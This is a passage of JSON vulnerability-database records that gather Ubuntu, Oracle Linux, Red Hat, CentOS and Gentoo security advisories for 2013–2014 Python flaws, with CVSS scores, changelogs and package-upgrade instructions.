overflow.", "edition": 1, "cvss3": {}, "published": "2014-07-14T00:00:00", "title": "python security vulnerabilities", "type": "securityvulns", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2014-4616", "CVE-2014-4650"], "modified": "2014-07-14T00:00:00", "id": "SECURITYVULNS:VULN:13867", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:13867", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}], "ubuntu": [{"lastseen": "2022-01-04T12:39:01", "description": "It was discovered that multiple Python protocol libraries incorrectly \nlimited certain data when connecting to servers. A malicious ftp, http, \nimap, nntp, pop or smtp server could use this issue to cause a denial of \nservice. (CVE-2013-1752)\n\nIt was discovered that the Python xmlrpc library did not limit unpacking \ngzip-compressed HTTP bodies. A malicious server could use this issue to \ncause a denial of service. (CVE-2013-1753)\n\nIt was discovered that the Python json module incorrectly handled a certain \nargument. An attacker could possibly use this issue to read arbitrary \nmemory and expose sensitive information. This issue only affected Ubuntu \n12.04 LTS and Ubuntu 14.04 LTS. (CVE-2014-4616)\n\nIt was discovered that the Python CGIHTTPServer incorrectly handled \nURL-encoded path separators in URLs. A remote attacker could use this issue \nto expose sensitive information, or possibly execute arbitrary code. This \nissue only affected Ubuntu 12.04 LTS and Ubuntu 14.04 LTS. (CVE-2014-4650)\n\nIt was discovered that Python incorrectly handled sizes and offsets in \nbuffer functions. An attacker could possibly use this issue to read \narbitrary memory and obtain sensitive information. This issue only affected \nUbuntu 12.04 LTS and Ubuntu 14.04 LTS. (CVE-2014-7185)\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2015-06-25T00:00:00", "type": "ubuntu", "title": "Python vulnerabilities", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-4616", "CVE-2014-4650", "CVE-2013-1752", "CVE-2013-1753", "CVE-2014-7185"], "modified": "2015-06-25T00:00:00", "id": "USN-2653-1", "href": "https://ubuntu.com/security/notices/USN-2653-1", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "oraclelinux": [{"lastseen": "2021-06-04T20:20:34", "description": "[2.7.5-34.0.1]\n- Add Oracle Linux distribution in platform.py [orabug 20812544]\n[2.7.5-34]\n- Revert fix for rhbz#1117751 as it leads to regressions\nResolves: rhbz#1117751\n[2.7.5-33]\n- Only restore SIG_PIPE when Popen called with restore_sigpipe\nResolves: rhbz#1117751\n[2.7.5-32]\n- Backport SSLSocket.version function\n- Temporary disable test_gdb on ppc64le rhbz#1260558\nResolves: rhbz#1259421\n[2.7.5-31]\n- Update load_cert_chain function to accept None keyfile\nResolves: rhbz#1250611\n[2.7.5-30]\n- Change Patch224 according to latest update in PEP493\nResolves:rhbz#1219108\n[2.7.5-29]\n- Popen shouldn't ignore SIG_PIPE\nResolves: rhbz#1117751\n[2.7.5-28]\n- Exclude python subprocess temp files from cleaning\nResolves: rhbz#1058482\n[2.7.5-27]\n- Add list for cprofile sort option\nResolves:rhbz#1237107\n[2.7.5-26]\n- Add switch to toggle cert verification on or off globally\nResolves:rhbz#1219108\n[2.7.5-25]\n- PEP476 enable cert verifications by default\nResolves:rhbz#1219110\n[2.7.5-24]\n- Massive backport of ssl module from python3 aka PEP466\nResolves: rhbz#1111461\n[2.7.5-23]\n- Fixed CVE-2013-1753, CVE-2013-1752, CVE-2014-4616, CVE-2014-4650, CVE-2014-7185\nResolves: rhbz#1206574\n[2.7.5-22]\n- Fix importing readline producing erroneous output\nResolves: rhbz#1189301\n[2.7.5-21]\n- Add missing import in bdist_rpm\nResolves: rhbz#1177613\n[2.7.5-20]\n- Avoid double close of subprocess pipes\nResolves: rhbz#1103452\n[2.7.5-19]\n- make multiprocessing ignore EINTR\nResolves: rhbz#1181624", "cvss3": {}, "published": "2015-11-23T00:00:00", "type": "oraclelinux", "title": "python security, bug fix, and enhancement update", "bulletinFamily": "unix", "cvss2": {}, "cvelist": ["CVE-2013-1752", "CVE-2013-1753", "CVE-2014-4616", "CVE-2014-4650", "CVE-2014-7185"], "modified": "2015-11-23T00:00:00", "id": "ELSA-2015-2101", "href": "http://linux.oracle.com/errata/ELSA-2015-2101.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-06-04T20:20:39", "description": "python27\n[1.1-17]\n- Require python-pip and python-wheel (note: in rh-python34\n this is not necessary, because 'python' depends on these).\npython27-python\n[2.7.8-3]\n- Add httplib fix for CVE-2013-1752\nResolves: rhbz#1187779\n[2.7.8-2]\n- Fix %check\nunset DISPLAY\n setion not failing properly on failed test\n- Fixed CVE-2013-1752, CVE-2013-1753\nResolves: rhbz#1187779\n[2.7.8-1]\n- Update to 2.7.8.\nResolves: rhbz#1167912\n- Make python-devel depend on scl-utils-build.\nResolves: rhbz#1170993\npython27-python-pip\n - New Package added\npython27-python-setuptools\n[0.9.8-3]\n- Enhance patch restoring proxy support in SSL connections\nResolves: rhbz#1222507\npython27-python-simplejson\n[3.2.0-2]\n- Fix CVE-2014-461, add boundary checks\nResolves: rhbz#1222534\npython27-python-wheel\n - New Package added ", "cvss3": {}, "published": "2016-02-04T00:00:00", "type": "oraclelinux", "title": "python27 security, bug fix, and enhancement update", "bulletinFamily": "unix", "cvss2": {}, "cvelist": ["CVE-2013-1752", "CVE-2013-1753", "CVE-2014-1912", "CVE-2014-4616", "CVE-2014-4650", "CVE-2014-7185"], "modified": "2016-02-04T00:00:00", "id": "ELSA-2015-1064", "href": "http://linux.oracle.com/errata/ELSA-2015-1064.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "redhat": [{"lastseen": "2021-10-21T04:46:00", "description": "Python is an interpreted, interactive, object-oriented programming language\noften compared to Tcl, Perl, Scheme, or Java. Python includes modules,\nclasses, exceptions, very high level dynamic data types and dynamic typing.\nPython supports interfaces to many system calls and libraries, as well as\nto various windowing systems (X11, Motif, Tk, Mac and MFC).\n\nIt was discovered that the Python xmlrpclib module did not restrict the\nsize of gzip-compressed HTTP responses. A malicious XMLRPC server could\ncause an XMLRPC client using xmlrpclib to consume an excessive amount of\nmemory. (CVE-2013-1753)\n\nIt was discovered that multiple Python standard library modules\nimplementing network protocols (such as httplib or smtplib) failed to\nrestrict the sizes of server responses. A malicious server could cause a\nclient using one of the affected modules to consume an excessive amount of\nmemory. (CVE-2013-1752)\n\nIt was discovered that the CGIHTTPServer module incorrectly handled URL\nencoded paths. A remote attacker could use this flaw to execute scripts\noutside of the cgi-bin directory, or disclose the source code of the\nscripts in the cgi-bin directory. (CVE-2014-4650)\n\nAn integer overflow flaw was found in the way the buffer() function handled\nits offset and size arguments. An attacker able to control these arguments\ncould use this flaw to disclose portions of the application memory or cause\nit to crash. (CVE-2014-7185)\n\nA flaw was found in the way the json module handled negative index\narguments passed to certain functions (such as raw_decode()). An attacker\nable to control the index value passed to one of the affected functions\ncould possibly use this flaw to disclose portions of the application\nmemory. (CVE-2014-4616)\n\nThe Python standard library HTTP client modules (such as httplib or urllib)\ndid not perform verification of TLS/SSL certificates when connecting to\nHTTPS servers. A man-in-the-middle attacker could use this flaw to hijack\nconnections and eavesdrop or modify transferred data. (CVE-2014-9365)\n\nNote: The Python standard library was updated to make it possible to enable\ncertificate verification by default. However, for backwards compatibility,\nverification remains disabled by default. Future updates may change this\ndefault. Refer to the Knowledgebase article 2039753 linked to in the\nReferences section for further details about this change. (BZ#1219108)\n\nThis update also fixes the following bugs:\n\n* Subprocesses used with the Eventlet library or regular threads previously\ntried to close epoll file descriptors twice, which led to an \"Invalid\nargument\" error. Subprocesses have been fixed to close the file descriptors\nonly once. (BZ#1103452)\n\n* When importing the readline module from a Python script, Python no longer\nproduces erroneous random characters on stdout. (BZ#1189301)\n\n* The cProfile utility has been fixed to print all values that the \"-s\"\noption supports when this option is used without a correct value.\n(BZ#1237107)\n\n* The load_cert_chain() function now accepts \"None\" as a keyfile argument.\n(BZ#1250611)\n\nIn addition, this update adds the following enhancements:\n\n* Security enhancements as described in PEP 466 have been backported to the\nPython standard library, for example, new features of the ssl module:\nServer Name Indication (SNI) support, support for new TLSv1.x protocols,\nnew hash algorithms in the hashlib module, and many more. (BZ#1111461)\n\n* Support for the ssl.PROTOCOL_TLSv1_2 protocol has been added to the ssl\nlibrary. (BZ#1192015)\n\n* The ssl.SSLSocket.version() method is now available to access information\nabout the version of the SSL protocol used in a connection. (BZ#1259421)\n\nAll python users are advised to upgrade to these updated packages, which\ncontain backported patches to correct these issues and add these\nenhancements.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2015-11-19T13:41:01", "type": "redhat", "title": "(RHSA-2015:2101) Moderate: python security, bug fix, and enhancement update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-1752", "CVE-2013-1753", "CVE-2014-4616", "CVE-2014-4650", "CVE-2014-7185", "CVE-2014-9365"], "modified": "2018-04-11T23:32:44", "id": "RHSA-2015:2101", "href": "https://access.redhat.com/errata/RHSA-2015:2101", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-10-19T20:37:25", "description": "Python is an interpreted, interactive, object-oriented programming language\nthat supports modules, classes, exceptions, high-level dynamic data types,\nand dynamic typing. The python27 collection provide a stable release of\nPython 2.7 with a number of additional utilities and database connectors\nfor MySQL and PostgreSQL.\n\nThe python27-python packages have been upgraded to upstream version 2.7.8,\nwhich provides numerous bug fixes over the previous version. (BZ#1167912)\n\nThe following security issues were fixed in the python27-python component:\n\nIt was discovered that the socket.recvfrom_into() function failed to check\nthe size of the supplied buffer. This could lead to a buffer overflow when\nthe function was called with an insufficiently sized buffer.\n(CVE-2014-1912)\n\nIt was discovered that the Python xmlrpclib module did not restrict the\nsize of gzip-compressed HTTP responses. A malicious XMLRPC server could\ncause an XMLRPC client using xmlrpclib to consume an excessive amount of\nmemory. (CVE-2013-1753)\n\nIt was discovered that multiple Python standard library modules\nimplementing network protocols (such as httplib or smtplib) failed to\nrestrict the sizes of server responses. A malicious server could cause a\nclient using one of the affected modules to consume an excessive amount of\nmemory. (CVE-2013-1752)\n\nIt was discovered that the CGIHTTPServer module incorrectly handled URL\nencoded paths. A remote attacker could use this flaw to execute scripts\noutside of the cgi-bin directory, or disclose the source code of the\nscripts in the cgi-bin directory. (CVE-2014-4650)\n\nAn integer overflow flaw was found in the way the buffer() function handled\nits offset and size arguments. An attacker able to control these arguments\ncould use this flaw to disclose portions of the application memory or cause\nit to crash. (CVE-2014-7185)\n\nThe following security issue was fixed in the python27-python and\npython27-python-simplejson components:\n\nA flaw was found in the way the json module handled negative index\narguments passed to certain functions (such as raw_decode()). An attacker\nable to control the index value passed to one of the affected functions\ncould possibly use this flaw to disclose portions of the application\nmemory. (CVE-2014-4616)\n\nIn addition, this update adds the following enhancement:\n\n* The python27 Software Collection now includes the python-wheel and\npython-pip modules. (BZ#994189, BZ#1167902)\n\nAll python27 users are advised to upgrade to these updated packages, which\ncorrect these issues and add these enhancements. All running python27\ninstances must be restarted for this update to take effect.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2015-06-04T00:00:00", "type": "redhat", "title": "(RHSA-2015:1064) Moderate: python27 security, bug fix, and enhancement update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-1752", "CVE-2013-1753", "CVE-2014-1912", "CVE-2014-4616", "CVE-2014-4650", "CVE-2014-7185"], "modified": "2018-06-12T21:28:19", "id": "RHSA-2015:1064", "href": "https://access.redhat.com/errata/RHSA-2015:1064", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "centos": [{"lastseen": "2022-02-27T16:06:36", "description": "**CentOS Errata and Security Advisory** CESA-2015:2101\n\n\nPython is an interpreted, interactive, object-oriented programming language\noften compared to Tcl, Perl, Scheme, or Java. Python includes modules,\nclasses, exceptions, very high level dynamic data types and dynamic typing.\nPython supports interfaces to many system calls and libraries, as well as\nto various windowing systems (X11, Motif, Tk, Mac and MFC).\n\nIt was discovered that the Python xmlrpclib module did not restrict the\nsize of gzip-compressed HTTP responses. A malicious XMLRPC server could\ncause an XMLRPC client using xmlrpclib to consume an excessive amount of\nmemory. (CVE-2013-1753)\n\nIt was discovered that multiple Python standard library modules\nimplementing network protocols (such as httplib or smtplib) failed to\nrestrict the sizes of server responses. A malicious server could cause a\nclient using one of the affected modules to consume an excessive amount of\nmemory. (CVE-2013-1752)\n\nIt was discovered that the CGIHTTPServer module incorrectly handled URL\nencoded paths. A remote attacker could use this flaw to execute scripts\noutside of the cgi-bin directory, or disclose the source code of the\nscripts in the cgi-bin directory. (CVE-2014-4650)\n\nAn integer overflow flaw was found in the way the buffer() function handled\nits offset and size arguments. An attacker able to control these arguments\ncould use this flaw to disclose portions of the application memory or cause\nit to crash. (CVE-2014-7185)\n\nA flaw was found in the way the json module handled negative index\narguments passed to certain functions (such as raw_decode()). An attacker\nable to control the index value passed to one of the affected functions\ncould possibly use this flaw to disclose portions of the application\nmemory. (CVE-2014-4616)\n\nThe Python standard library HTTP client modules (such as httplib or urllib)\ndid not perform verification of TLS/SSL certificates when connecting to\nHTTPS servers. A man-in-the-middle attacker could use this flaw to hijack\nconnections and eavesdrop or modify transferred data. (CVE-2014-9365)\n\nNote: The Python standard library was updated to make it possible to enable\ncertificate verification by default. However, for backwards compatibility,\nverification remains disabled by default. Future updates may change this\ndefault. Refer to the Knowledgebase article 2039753 linked to in the\nReferences section for further details about this change. (BZ#1219108)\n\nThis update also fixes the following bugs:\n\n* Subprocesses used with the Eventlet library or regular threads previously\ntried to close epoll file descriptors twice, which led to an \"Invalid\nargument\" error. Subprocesses have been fixed to close the file descriptors\nonly once. (BZ#1103452)\n\n* When importing the readline module from a Python script, Python no longer\nproduces erroneous random characters on stdout. (BZ#1189301)\n\n* The cProfile utility has been fixed to print all values that the \"-s\"\noption supports when this option is used without a correct value.\n(BZ#1237107)\n\n* The load_cert_chain() function now accepts \"None\" as a keyfile argument.\n(BZ#1250611)\n\nIn addition, this update adds the following enhancements:\n\n* Security enhancements as described in PEP 466 have been backported to the\nPython standard library, for example, new features of the ssl module:\nServer Name Indication (SNI) support, support for new TLSv1.x protocols,\nnew hash algorithms in the hashlib module, and many more. (BZ#1111461)\n\n* Support for the ssl.PROTOCOL_TLSv1_2 protocol has been added to the ssl\nlibrary. (BZ#1192015)\n\n* The ssl.SSLSocket.version() method is now available to access information\nabout the version of the SSL protocol used in a connection. (BZ#1259421)\n\nAll python users are advised to upgrade to these updated packages, which\ncontain backported patches to correct these issues and add these\nenhancements.\n\n**Merged security bulletin from advisories:**\nhttps://lists.centos.org/pipermail/centos-cr-announce/2015-November/015450.html\n\n**Affected packages:**\npython\npython-debug\npython-devel\npython-libs\npython-test\npython-tools\ntkinter\n\n**Upstream details at:**\nhttps://access.redhat.com/errata/RHSA-2015:2101", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2015-11-30T19:48:49", "type": "centos", "title": "python, tkinter security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-1752", "CVE-2013-1753", "CVE-2014-4616", "CVE-2014-4650", "CVE-2014-7185", "CVE-2014-9365"], "modified": "2015-11-30T19:48:49", "id": "CESA-2015:2101", "href": "https://lists.centos.org/pipermail/centos-cr-announce/2015-November/015450.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "gentoo": [{"lastseen": "2022-01-17T19:07:06", "description": "### Background\n\nPython is an interpreted, interactive, object-oriented programming language. \n\n### Description\n\nMultiple vulnerabilities have been discovered in Python. Please review the CVE identifiers referenced below for details. \n\n### Impact\n\nA context-dependent attacker may be able to execute arbitrary code or cause a Denial of Service condition. \n\n### Workaround\n\nThere is no known workaround at this time.\n\n### Resolution\n\nAll Python 3.3 users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=dev-lang/python-3.3.5-r1\"\n \n\nAll Python 2.7 users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=dev-lang/python-2.7.9-r1\"", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.9, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 3.6}, "published": "2015-03-18T00:00:00", "type": "gentoo", "title": "Python: Multiple vulnerabilities", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-1752", "CVE-2013-7338", "CVE-2014-1912", "CVE-2014-2667", "CVE-2014-4616", "CVE-2014-7185", "CVE-2014-9365"], "modified": "2015-06-17T00:00:00", "id": "GLSA-201503-10", "href": "https://security.gentoo.org/glsa/201503-10", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}]}